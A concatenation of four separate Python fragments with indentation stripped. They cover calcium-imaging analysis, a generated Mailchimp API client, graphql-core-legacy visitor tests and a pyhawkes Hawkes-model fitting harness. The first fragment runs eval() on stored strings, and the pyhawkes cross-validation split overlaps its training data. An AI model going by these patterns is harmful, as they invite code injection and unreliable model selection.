logging.debug('Saved metrics in .npz format')
return tmpl, smoothness, smoothness_corr, correlations, img_corr, flows, norms
def compare_crispness(selected_rows = None):
total_states_number = len(selected_rows)
crispness_mean = np.zeros(total_states_number-1)
crispness_corr = np.zeros(total_states_number-1)
crispness_mean_original = np.zeros(total_states_number-1)
crispness_corr_original = np.zeros(total_states_number-1)
#for ii in range(0,total_states_number-1):
for ii in range(0,total_states_number-1):
currect_row = selected_rows.iloc[ii+1]
output_dic = eval(currect_row['motion_correction_output'])
crispness_mean_original[ii] = output_dic['meta']['metrics']['original']['crispness']
crispness_corr_original[ii] = output_dic['meta']['metrics']['original']['crispness_corr']
if 'rigid' in output_dic['meta']['metrics'].keys():
crispness_mean[ii] = output_dic['meta']['metrics']['rigid']['crispness']
crispness_corr[ii] = output_dic['meta']['metrics']['rigid']['crispness_corr']
else:
crispness_mean[ii] = output_dic['meta']['metrics']['pw_rigid']['crispness']
crispness_corr[ii] = output_dic['meta']['metrics']['pw_rigid']['crispness_corr']
return crispness_mean_original,crispness_corr_original, crispness_mean, crispness_corr
def select_corr_pnr_threshold(mouse_row,parameters_source_extraction):
'''
Plots the summary images correlation and pnr. Also the pointwise product between them (used in Caiman paper Zhou
et al 2018)
:param mouse_row:
:param parameters_source_extraction: parameters that will be used for source
extraction. the relevant parameter here are min_corr and min_pnr because the source extraction algorithm is
initialized (initial cell templates) in all values that surpasses that threshold
:return: max_combined, max_pnr, max_corr: threshold for corr*pnr, and corresponding values of corr and pnr
'''
input_mmap_file_path = eval(mouse_row.loc['motion_correction_output'])['main']
# Load memory mappable input file
if os.path.isfile(input_mmap_file_path):
Yr, dims, T = cm.load_memmap(input_mmap_file_path)
# logging.debug(f'{index} Loaded movie. dims = {dims}, T = {T}.')
images = Yr.T.reshape((T,) + dims, order='F')
else:
logging.warning(f'{mouse_row.name} .mmap file does not exist. Cancelling')
# Determine output paths
step_index = db.get_step_index('motion_correction')
data_dir = 'data/interim/source_extraction/trial_wise/'
# Check if the summary images are already there
gSig = parameters_source_extraction['gSig'][0]
corr_npy_file_path, pnr_npy_file_path = fm.get_corr_pnr_path(mouse_row.name, gSig_abs=(gSig, gSig))
if corr_npy_file_path != None and os.path.isfile(corr_npy_file_path):
# Already computed summary images
logging.info(f'{mouse_row.name} Already computed summary images')
cn_filter = np.load(corr_npy_file_path)
pnr = np.load(pnr_npy_file_path)
else:
# Compute summary images
t0 = datetime.datetime.today()
logging.info(f'{mouse_row.name} Computing summary images')
cn_filter, pnr = cm.summary_images.correlation_pnr(images[::1], gSig=parameters_source_extraction['gSig'][0],
swap_dim=False)
# Saving summary images as npy files
corr_npy_file_path = data_dir + f'meta/corr/{db.create_file_name(3, mouse_row.name)}_gSig_{gSig}.npy'
pnr_npy_file_path = data_dir + f'meta/pnr/{db.create_file_name(3, mouse_row.name)}_gSig_{gSig}.npy'
with open(corr_npy_file_path, 'wb') as f:
np.save(f, cn_filter)
with open(pnr_npy_file_path, 'wb') as f:
np.save(f, pnr)
combination = cn_filter * pnr # this is as defined in Zhou et al 2018 (definition of R, P and L, eq 14)
max_combined = np.argmax(combination)
row = int(np.floor(max_combined / cn_filter.shape[1]))
column = int(max_combined - row * cn_filter.shape[1])
max_corr = cn_filter[row, column]
max_pnr = pnr[row, column]
return max_combined, max_corr, max_pnr
def create_corr_pnr_histogram(mouse_row,parameters_source_extraction):
'''
Returns histogram of summary images correlation and pnr
:param mouse_row:
:param parameters_source_extraction: parameters that will be used for source extraction.
:return: histogram vector
'''
input_mmap_file_path = eval(mouse_row.loc['motion_correction_output'])['main']
# Load memory mappable input file
if os.path.isfile(input_mmap_file_path):
Yr, dims, T = cm.load_memmap(input_mmap_file_path)
# logging.debug(f'{index} Loaded movie. dims = {dims}, T = {T}.')
images = Yr.T.reshape((T,) + dims, order='F')
else:
logging.warning(f'{mouse_row.name} .mmap file does not exist. Cancelling')
# Determine output paths
step_index = db.get_step_index('motion_correction')
data_dir = 'data/interim/source_extraction/trial_wise/'
# Check if the summary images are already there
gSig = parameters_source_extraction['gSig'][0]
corr_npy_file_path, pnr_npy_file_path = fm.get_corr_pnr_path(mouse_row.name, gSig_abs=(gSig, gSig))
if corr_npy_file_path != None | |
>>> thread = api.get_segment_members_list(list_id, segment_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:param str segment_id: The unique id for the segment. (required)
:param list[str] fields: A comma-separated list of fields to return. Reference parameters of sub-objects with dot notation.
:param list[str] exclude_fields: A comma-separated list of fields to exclude. Reference parameters of sub-objects with dot notation.
:param int count: The number of records to return. Default value is 10. Maximum value is 1000
:param int offset: Used for [pagination](https://mailchimp.com/developer/marketing/docs/methods-parameters/#pagination), this it the number of records from a collection to skip. Default value is 0.
:param bool include_cleaned: Include cleaned members in response
:param bool include_transactional: Include transactional members in response
:param bool include_unsubscribed: Include unsubscribed members in response
:return: SegmentMembers
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_segment_members_list_with_http_info(list_id, segment_id, **kwargs) # noqa: E501
else:
(data) = self.get_segment_members_list_with_http_info(list_id, segment_id, **kwargs) # noqa: E501
return data
def get_segment_members_list_with_http_info(self, list_id, segment_id, **kwargs): # noqa: E501
"""List members in segment # noqa: E501
Get information about members in a saved segment. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_segment_members_list_with_http_info(list_id, segment_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:param str segment_id: The unique id for the segment. (required)
:param list[str] fields: A comma-separated list of fields to return. Reference parameters of sub-objects with dot notation.
:param list[str] exclude_fields: A comma-separated list of fields to exclude. Reference parameters of sub-objects with dot notation.
:param int count: The number of records to return. Default value is 10. Maximum value is 1000
:param int offset: Used for [pagination](https://mailchimp.com/developer/marketing/docs/methods-parameters/#pagination), this it the number of records from a collection to skip. Default value is 0.
:param bool include_cleaned: Include cleaned members in response
:param bool include_transactional: Include transactional members in response
:param bool include_unsubscribed: Include unsubscribed members in response
:return: SegmentMembers
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['list_id', 'segment_id', 'fields', 'exclude_fields', 'count', 'offset', 'include_cleaned', 'include_transactional', 'include_unsubscribed'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_segment_members_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'list_id' is set
if ('list_id' not in params or
params['list_id'] is None):
raise ValueError("Missing the required parameter `list_id` when calling ``") # noqa: E501
# verify the required parameter 'segment_id' is set
if ('segment_id' not in params or
params['segment_id'] is None):
raise ValueError("Missing the required parameter `segment_id` when calling ``") # noqa: E501
if 'count' in params and params['count'] > 1000: # noqa: E501
raise ValueError("Invalid value for parameter `count` when calling ``, must be a value less than or equal to `1000`") # noqa: E501
collection_formats = {}
path_params = {}
if 'list_id' in params:
path_params['list_id'] = params['list_id'] # noqa: E501
if 'segment_id' in params:
path_params['segment_id'] = params['segment_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
collection_formats['fields'] = 'csv' # noqa: E501
if 'exclude_fields' in params:
query_params.append(('exclude_fields', params['exclude_fields'])) # noqa: E501
collection_formats['exclude_fields'] = 'csv' # noqa: E501
if 'count' in params:
query_params.append(('count', params['count'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'include_cleaned' in params:
query_params.append(('include_cleaned', params['include_cleaned'])) # noqa: E501
if 'include_transactional' in params:
query_params.append(('include_transactional', params['include_transactional'])) # noqa: E501
if 'include_unsubscribed' in params:
query_params.append(('include_unsubscribed', params['include_unsubscribed'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/problem+json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/lists/{list_id}/segments/{segment_id}/members', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SegmentMembers', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_list_signup_forms(self, list_id, **kwargs): # noqa: E501
"""List signup forms # noqa: E501
Get signup forms for a specific list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_list_signup_forms(list_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:return: ListSignupForms
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_list_signup_forms_with_http_info(list_id, **kwargs) # noqa: E501
else:
(data) = self.get_list_signup_forms_with_http_info(list_id, **kwargs) # noqa: E501
return data
def get_list_signup_forms_with_http_info(self, list_id, **kwargs): # noqa: E501
"""List signup forms # noqa: E501
Get signup forms for a specific list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_list_signup_forms_with_http_info(list_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:return: ListSignupForms
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['list_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_list_signup_forms" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'list_id' is set
if ('list_id' not in params or
params['list_id'] is None):
raise ValueError("Missing the required parameter `list_id` when calling ``") # noqa: E501
collection_formats = {}
path_params = {}
if 'list_id' in params:
path_params['list_id'] = params['list_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/problem+json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/lists/{list_id}/signup-forms', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListSignupForms', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_list_webhooks(self, list_id, **kwargs): # noqa: E501
"""List webhooks # noqa: E501
Get information about all webhooks for a specific list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_list_webhooks(list_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:return: ListWebhooks
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_list_webhooks_with_http_info(list_id, **kwargs) # noqa: E501
else:
(data) = self.get_list_webhooks_with_http_info(list_id, **kwargs) # noqa: E501
return data
def get_list_webhooks_with_http_info(self, list_id, **kwargs): # noqa: E501
"""List webhooks # noqa: E501
Get information about all webhooks for a specific list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_list_webhooks_with_http_info(list_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str list_id: The unique ID for the list. (required)
:return: ListWebhooks
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['list_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_list_webhooks" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'list_id' is set
if ('list_id' not in params or
params['list_id'] is None):
raise ValueError("Missing the required parameter `list_id` when calling ``") # noqa: E501
collection_formats = {}
path_params = {}
if 'list_id' in params:
path_params['list_id'] = params['list_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] | |
<reponame>ThanksBoomerang/graphql-core-legacy
from graphql.language.ast import (
Document,
Field,
Name,
OperationDefinition,
SelectionSet,
)
from graphql.language.parser import parse
from graphql.language.printer import print_ast
from graphql.language.visitor import (
BREAK,
REMOVE,
ParallelVisitor,
TypeInfoVisitor,
Visitor,
visit,
)
from graphql.type import get_named_type, is_composite_type
from graphql.utils.type_info import TypeInfo
from ...validation.tests.utils import test_schema
from .fixtures import KITCHEN_SINK
from graphql.language.ast import Document
from graphql.language.ast import OperationDefinition
from graphql.language.ast import SelectionSet
from typing import Any
from typing import Optional
from typing import Union
from graphql.language.ast import Field
from graphql.language.ast import Name
from graphql.language.visitor import _Falsey
from typing import List
from graphql.language.ast import Argument
from graphql.language.ast import IntValue
def test_allows_editing_a_node_both_on_enter_and_on_leave():
# type: () -> None
ast = parse("{ a, b, c { a, b, c } }", no_location=True)
class TestVisitor(Visitor):
def __init__(self):
# type: () -> None
self.did_enter = False
self.did_leave = False
def enter(
self,
node, # type: Union[Document, OperationDefinition, SelectionSet]
*args # type: Any
):
# type: (...) -> Optional[OperationDefinition]
if isinstance(node, OperationDefinition):
self.did_enter = True
selection_set = node.selection_set
self.selections = None
if selection_set:
self.selections = selection_set.selections
new_selection_set = SelectionSet(selections=[])
return OperationDefinition(
name=node.name,
variable_definitions=node.variable_definitions,
directives=node.directives,
loc=node.loc,
operation=node.operation,
selection_set=new_selection_set,
)
def leave(
self,
node, # type: Union[Document, OperationDefinition, SelectionSet]
*args # type: Any
):
# type: (...) -> Optional[OperationDefinition]
if isinstance(node, OperationDefinition):
self.did_leave = True
new_selection_set = None
if self.selections:
new_selection_set = SelectionSet(selections=self.selections)
return OperationDefinition(
name=node.name,
variable_definitions=node.variable_definitions,
directives=node.directives,
loc=node.loc,
operation=node.operation,
selection_set=new_selection_set,
)
visitor = TestVisitor()
edited_ast = visit(ast, visitor)
assert ast == parse("{ a, b, c { a, b, c } }", no_location=True)
assert edited_ast == ast
assert visitor.did_enter
assert visitor.did_leave
def test_allows_editing_the_root_node_on_enter_and_on_leave():
# type: () -> None
ast = parse("{ a, b, c { a, b, c } }", no_location=True)
definitions = ast.definitions
class TestVisitor(Visitor):
def __init__(self):
# type: () -> None
self.did_enter = False
self.did_leave = False
def enter(self, node, *args):
# type: (Document, *Any) -> Document
if isinstance(node, Document):
self.did_enter = True
return Document(loc=node.loc, definitions=[])
def leave(self, node, *args):
# type: (Document, *Any) -> Document
if isinstance(node, Document):
self.did_leave = True
return Document(loc=node.loc, definitions=definitions)
visitor = TestVisitor()
edited_ast = visit(ast, visitor)
assert edited_ast == ast
assert visitor.did_enter
assert visitor.did_leave
def test_allows_for_editing_on_enter():
# type: () -> None
ast = parse("{ a, b, c { a, b, c } }", no_location=True)
class TestVisitor(Visitor):
def enter(self, node, *args):
# type: (Any, *Any) -> Optional[Any]
if isinstance(node, Field) and node.name.value == "b":
return REMOVE
edited_ast = visit(ast, TestVisitor())
assert ast == parse("{ a, b, c { a, b, c } }", no_location=True)
assert edited_ast == parse("{ a, c { a, c } }", no_location=True)
def test_allows_for_editing_on_leave():
# type: () -> None
ast = parse("{ a, b, c { a, b, c } }", no_location=True)
class TestVisitor(Visitor):
def leave(self, node, *args):
# type: (Union[Field, Name], *Any) -> Optional[Falsey]
if isinstance(node, Field) and node.name.value == "b":
return REMOVE
edited_ast = visit(ast, TestVisitor())
assert ast == parse("{ a, b, c { a, b, c } }", no_location=True)
assert edited_ast == parse("{ a, c { a, c } }", no_location=True)
def test_visits_edited_node():
# type: () -> None
added_field = Field(name=Name(value="__typename"))
ast = parse("{ a { x } }")
class TestVisitor(Visitor):
def __init__(self):
# type: () -> None
self.did_visit_added_field = False
def enter(self, node, *args):
# type: (Any, *Any) -> Optional[Field]
if isinstance(node, Field) and node.name.value == "a":
selection_set = node.selection_set
selections = []
if selection_set:
selections = selection_set.selections
new_selection_set = SelectionSet(selections=[added_field] + selections)
return Field(name=None, selection_set=new_selection_set)
if node is added_field:
self.did_visit_added_field = True
visitor = TestVisitor()
visit(ast, visitor)
assert visitor.did_visit_added_field
def test_allows_skipping_a_subtree():
# type: () -> None
visited = []
ast = parse("{ a, b { x }, c }")
class TestVisitor(Visitor):
def enter(self, node, *args):
# type: (Any, *Any) -> Optional[Any]
visited.append(["enter", type(node).__name__, getattr(node, "value", None)])
if isinstance(node, Field) and node.name.value == "b":
return False
def leave(self, node, *args):
# type: (Union[Field, Name, SelectionSet], *Any) -> None
visited.append(["leave", type(node).__name__, getattr(node, "value", None)])
visit(ast, TestVisitor())
assert visited == [
["enter", "Document", None],
["enter", "OperationDefinition", None],
["enter", "SelectionSet", None],
["enter", "Field", None],
["enter", "Name", "a"],
["leave", "Name", "a"],
["leave", "Field", None],
["enter", "Field", None],
["enter", "Field", None],
["enter", "Name", "c"],
["leave", "Name", "c"],
["leave", "Field", None],
["leave", "SelectionSet", None],
["leave", "OperationDefinition", None],
["leave", "Document", None],
]
def test_allows_early_exit_while_visiting():
# type: () -> None
visited = []
ast = parse("{ a, b { x }, c }")
class TestVisitor(Visitor):
def enter(self, node, *args):
# type: (Any, *Any) -> Optional[Any]
visited.append(["enter", type(node).__name__, getattr(node, "value", None)])
if isinstance(node, Name) and node.value == "x":
return BREAK
def leave(self, node, *args):
# type: (Union[Field, Name], *Any) -> None
visited.append(["leave", type(node).__name__, getattr(node, "value", None)])
visit(ast, TestVisitor())
assert visited == [
["enter", "Document", None],
["enter", "OperationDefinition", None],
["enter", "SelectionSet", None],
["enter", "Field", None],
["enter", "Name", "a"],
["leave", "Name", "a"],
["leave", "Field", None],
["enter", "Field", None],
["enter", "Name", "b"],
["leave", "Name", "b"],
["enter", "SelectionSet", None],
["enter", "Field", None],
["enter", "Name", "x"],
]
def test_allows_a_named_functions_visitor_api():
# type: () -> None
visited = []
ast = parse("{ a, b { x }, c }")
class TestVisitor(Visitor):
def enter_Name(self, node, *args):
# type: (Name, *Any) -> None
visited.append(["enter", type(node).__name__, getattr(node, "value", None)])
def enter_SelectionSet(self, node, *args):
# type: (SelectionSet, *Any) -> None
visited.append(["enter", type(node).__name__, getattr(node, "value", None)])
def leave_SelectionSet(self, node, *args):
# type: (SelectionSet, *Any) -> None
visited.append(["leave", type(node).__name__, getattr(node, "value", None)])
visit(ast, TestVisitor())
assert visited == [
["enter", "SelectionSet", None],
["enter", "Name", "a"],
["enter", "Name", "b"],
["enter", "SelectionSet", None],
["enter", "Name", "x"],
["leave", "SelectionSet", None],
["enter", "Name", "c"],
["leave", "SelectionSet", None],
]
def test_visits_kitchen_sink():
# type: () -> None
visited = []
ast = parse(KITCHEN_SINK)
class TestVisitor(Visitor):
def enter(self, node, key, parent, *args):
# type: (Any, Union[None, int, str], Any, *List[Any]) -> None
kind = parent and type(parent).__name__
if kind == "list":
kind = None
visited.append(["enter", type(node).__name__, key, kind])
def leave(self, node, key, parent, *args):
# type: (Any, Union[int, str], Any, *List[Any]) -> None
kind = parent and type(parent).__name__
if kind == "list":
kind = None
visited.append(["leave", type(node).__name__, key, kind])
visit(ast, TestVisitor())
assert visited == [
["enter", "Document", None, None],
["enter", "OperationDefinition", 0, None],
["enter", "Name", "name", "OperationDefinition"],
["leave", "Name", "name", "OperationDefinition"],
["enter", "VariableDefinition", 0, None],
["enter", "Variable", "variable", "VariableDefinition"],
["enter", "Name", "name", "Variable"],
["leave", "Name", "name", "Variable"],
["leave", "Variable", "variable", "VariableDefinition"],
["enter", "NamedType", "type", "VariableDefinition"],
["enter", "Name", "name", "NamedType"],
["leave", "Name", "name", "NamedType"],
["leave", "NamedType", "type", "VariableDefinition"],
["leave", "VariableDefinition", 0, None],
["enter", "VariableDefinition", 1, None],
["enter", "Variable", "variable", "VariableDefinition"],
["enter", "Name", "name", "Variable"],
["leave", "Name", "name", "Variable"],
["leave", "Variable", "variable", "VariableDefinition"],
["enter", "NamedType", "type", "VariableDefinition"],
["enter", "Name", "name", "NamedType"],
["leave", "Name", "name", "NamedType"],
["leave", "NamedType", "type", "VariableDefinition"],
["enter", "EnumValue", "default_value", "VariableDefinition"],
["leave", "EnumValue", "default_value", "VariableDefinition"],
["leave", "VariableDefinition", 1, None],
["enter", "SelectionSet", "selection_set", "OperationDefinition"],
["enter", "Field", 0, None],
["enter", "Name", "alias", "Field"],
["leave", "Name", "alias", "Field"],
["enter", "Name", "name", "Field"],
["leave", "Name", "name", "Field"],
["enter", "Argument", 0, None],
["enter", "Name", "name", "Argument"],
["leave", "Name", "name", "Argument"],
["enter", "ListValue", "value", "Argument"],
["enter", "IntValue", 0, None],
["leave", "IntValue", 0, None],
["enter", "IntValue", 1, None],
["leave", "IntValue", 1, None],
["leave", "ListValue", "value", "Argument"],
["leave", "Argument", 0, None],
["enter", "SelectionSet", "selection_set", "Field"],
["enter", "Field", 0, None],
["enter", "Name", "name", "Field"],
["leave", "Name", "name", "Field"],
["leave", "Field", 0, None],
["enter", "InlineFragment", 1, None],
["enter", "NamedType", "type_condition", "InlineFragment"],
["enter", "Name", "name", "NamedType"],
["leave", "Name", "name", "NamedType"],
["leave", "NamedType", "type_condition", "InlineFragment"],
["enter", "Directive", 0, None],
["enter", "Name", "name", "Directive"],
["leave", "Name", "name", "Directive"],
["leave", "Directive", 0, None],
["enter", "SelectionSet", "selection_set", "InlineFragment"],
["enter", "Field", 0, None],
["enter", "Name", "name", "Field"],
["leave", "Name", "name", "Field"],
["enter", "SelectionSet", "selection_set", "Field"],
["enter", "Field", 0, None],
["enter", "Name", "name", "Field"],
["leave", "Name", "name", "Field"],
["leave", "Field", 0, None],
["enter", "Field", 1, None],
["enter", "Name", "alias", "Field"],
["leave", "Name", "alias", "Field"],
["enter", "Name", "name", "Field"],
["leave", "Name", "name", "Field"],
["enter", "Argument", 0, None],
["enter", "Name", "name", "Argument"],
["leave", "Name", "name", "Argument"],
["enter", "IntValue", "value", "Argument"],
["leave", "IntValue", "value", "Argument"],
["leave", "Argument", 0, None],
["enter", "Argument", 1, None],
["enter", "Name", "name", "Argument"],
["leave", "Name", "name", "Argument"],
["enter", "Variable", "value", "Argument"],
["enter", "Name", "name", "Variable"],
["leave", "Name", "name", "Variable"],
["leave", "Variable", "value", "Argument"],
["leave", "Argument", 1, None],
["enter", "Directive", 0, None],
["enter", "Name", "name", | |
<gh_stars>0
"""
Test harness for fitting the competing models.
"""
import time
import pickle
import copy
import os
import gzip
import numpy as np
from collections import namedtuple
from pybasicbayes.util.text import progprint_xrange
# Use the Agg backend in running on a server without the DISPLAY variable
if "DISPLAY" not in os.environ:
import matplotlib
matplotlib.use('Agg')
from pyhawkes.utils.utils import convert_discrete_to_continuous
from pyhawkes.models import DiscreteTimeNetworkHawkesModelGammaMixture, \
DiscreteTimeNetworkHawkesModelGammaMixtureSBM, \
DiscreteTimeNetworkHawkesModelSpikeAndSlab, \
ContinuousTimeNetworkHawkesModel
from pyhawkes.standard_models import ReluNonlinearHawkesProcess, StandardHawkesProcess, ExpNonlinearHawkesProcess, HomogeneousPoissonProcess
Results = namedtuple("Results", ["samples", "timestamps", "lps", "test_lls"])
def fit_homogeneous_pp_model(S, S_test, dt, dt_max, output_path,
model_args={}):
T,K = S.shape
# Check for existing Gibbs results
test_model = HomogeneousPoissonProcess(K=K, dt=dt, dt_max=dt_max, **model_args)
test_model.add_data(S)
# Initialize the background rates to their mean
test_model.initialize_to_background_rate()
lps = [test_model.log_likelihood()]
hlls = [test_model.heldout_log_likelihood(S_test)]
# Convert to arrays
lps = np.array(lps)
hlls = np.array(hlls)
timestamps = np.array([0])
# Make results object
results = Results([test_model.copy_sample()], timestamps, lps, hlls)
return results
def fit_standard_hawkes_model_bfgs(S, S_test, dt, dt_max, output_path,
standard_model=None,
model_args={}):
T,K = S.shape
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading standard BFGS results from ", output_path)
results = pickle.load(f)
else:
# Split into test and training
xv_len = 1000
S_train = S[:-xv_len]
S_xv = S[xv_len:]
def _fit(lmbda):
print("Fitting a standard Hawkes model using BFGS")
test_model = StandardHawkesProcess(K=K, dt=dt, dt_max=dt_max, lmbda=lmbda, **model_args)
test_model.add_data(S_train)
# Initialize the background rates to their mean
test_model.initialize_to_background_rate()
lps = [test_model.log_likelihood()]
hlls = [test_model.heldout_log_likelihood(S_test)]
# Fit with BFGS
tic = time.clock()
test_model.fit_with_bfgs()
init_time = time.clock() - tic
lps.append(test_model.log_likelihood())
hlls.append(test_model.heldout_log_likelihood(S_test))
# Convert to arrays
lps = np.array(lps)
hlls = np.array(hlls)
timestamps = np.array([0, init_time])
# Make results object
results = Results([test_model.copy_sample()], timestamps, lps, hlls)
# Compute cross validation log likelihood
xv_ll = test_model.heldout_log_likelihood(S_xv)
return xv_ll, results
# Fit models with a range of regularization parameters
lmbdas = [.1, 1., 5., 10.]
xv_lls = []
xv_results = []
for lmbda in lmbdas:
xv_ll, results = _fit(lmbda)
xv_lls.append(xv_ll)
xv_results.append(results)
# Find the best
for lmbda, xv_ll in zip(lmbdas, xv_lls):
print("Lambda: ", lmbda, "\tXV LL: ", xv_ll)
best = np.argmax(xv_lls)
results = xv_results[best]
print("Best: ", best)
# Save the model
with gzip.open(output_path, 'w') as f:
print("Saving std BFGS results to ", output_path)
pickle.dump(results, f, protocol=-1)
return results
def fit_nonlinear_hawkes_model_bfgs(S, S_test, dt, dt_max, output_path,
model_args={}):
T,K = S.shape
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading nonlinear BFGS results from ", output_path)
results = pickle.load(f)
else:
# Split into test and training
xv_len = int(0.01 * len(S))
S_train = S[:-xv_len]
S_xv = S[xv_len:]
def _fit(lmbda):
print("Fitting a nonlinear Hawkes model using BFGS")
test_model = ReluNonlinearHawkesProcess(K=K, dt=dt, dt_max=dt_max, lmbda=lmbda, **model_args)
test_model.add_data(S_train)
# Initialize the background rates to their mean
test_model.initialize_to_background_rate()
lps = [test_model.log_likelihood()]
hlls = [test_model.heldout_log_likelihood(S_test)]
# Fit with BFGS
tic = time.clock()
test_model.fit_with_bfgs()
init_time = time.clock() - tic
lps.append(test_model.log_likelihood())
hlls.append(test_model.heldout_log_likelihood(S_test))
# Convert to arrays
lps = np.array(lps)
hlls = np.array(hlls)
timestamps = np.array([0, init_time])
# Make results object
results = Results([test_model.copy_sample()], timestamps, lps, hlls)
# Compute cross validation log likelihood
xv_ll = test_model.heldout_log_likelihood(S_xv)
return xv_ll, results
# Fit models with a range of regularization parameters
lmbdas = [.1, 1., 5., 10.]
xv_lls = []
xv_results = []
for lmbda in lmbdas:
xv_ll, results = _fit(lmbda)
xv_lls.append(xv_ll)
xv_results.append(results)
# Find the best
for lmbda, xv_ll in zip(lmbdas, xv_lls):
print("Lambda: ", lmbda, "\tXV LL: ", xv_ll)
best = np.argmax(xv_lls)
results = xv_results[best]
print("Best: ", best)
# Save the model
with gzip.open(output_path, 'w') as f:
print("Saving nonlinear BFGS results to ", output_path)
pickle.dump(results, f, protocol=-1)
return results
def fit_spikeslab_network_hawkes_gibbs(S, S_test, dt, dt_max, output_path,
model_args={}, standard_model=None,
N_samples=100, time_limit=8*60*60):
T,K = S.shape
# Check for existing Gibbs results
if os.path.exists(output_path):
with gzip.open(output_path, 'r') as f:
print("Loading Gibbs results from ", output_path)
results = pickle.load(f)
else:
print("Fitting the data with a network Hawkes model using Gibbs sampling")
test_model = DiscreteTimeNetworkHawkesModelSpikeAndSlab(K=K, dt=dt, dt_max=dt_max, **model_args)
test_model.add_data(S)
# Initialize with the standard model parameters
if standard_model is not None:
test_model.initialize_with_standard_model(standard_model)
# TODO: Precompute F_test
F_test = test_model.basis.convolve_with_basis(S_test)
# Gibbs sample
samples = []
lps = [test_model.log_probability()]
hlls = [test_model.heldout_log_likelihood(S_test)]
times = [0]
for _ in progprint_xrange(N_samples, perline=10):
# Update the model
tic = time.time()
test_model.resample_model()
samples.append(copy.deepcopy(test_model.get_parameters()))
times.append(time.time() - tic)
# Compute log probability and heldout log likelihood
# lps.append(test_model.log_probability())
hlls.append(test_model.heldout_log_likelihood(S_test, F=F_test))
# # Save this sample
# with open(output_path + ".gibbs.itr%04d.pkl" % itr, 'w') as f:
# cPickle.dump(samples[-1], f, protocol=-1)
# Check if time limit has been exceeded
if np.sum(times) > time_limit:
break
# Get cumulative timestamps
timestamps = np.cumsum(times)
lps = np.array(lps)
hlls = np.array(hlls)
# Make results object
results = Results(samples, timestamps, lps, hlls)
# Save the Gibbs samples
with gzip.open(output_path, 'w') as f:
print("Saving Gibbs samples to ", output_path)
pickle.dump(results, f, protocol=-1)
return results
def fit_ct_network_hawkes_gibbs(S, S_test, dt, dt_max, output_path,
model_args={}, standard_model=None,
N_samples=100, time_limit=8*60*60):
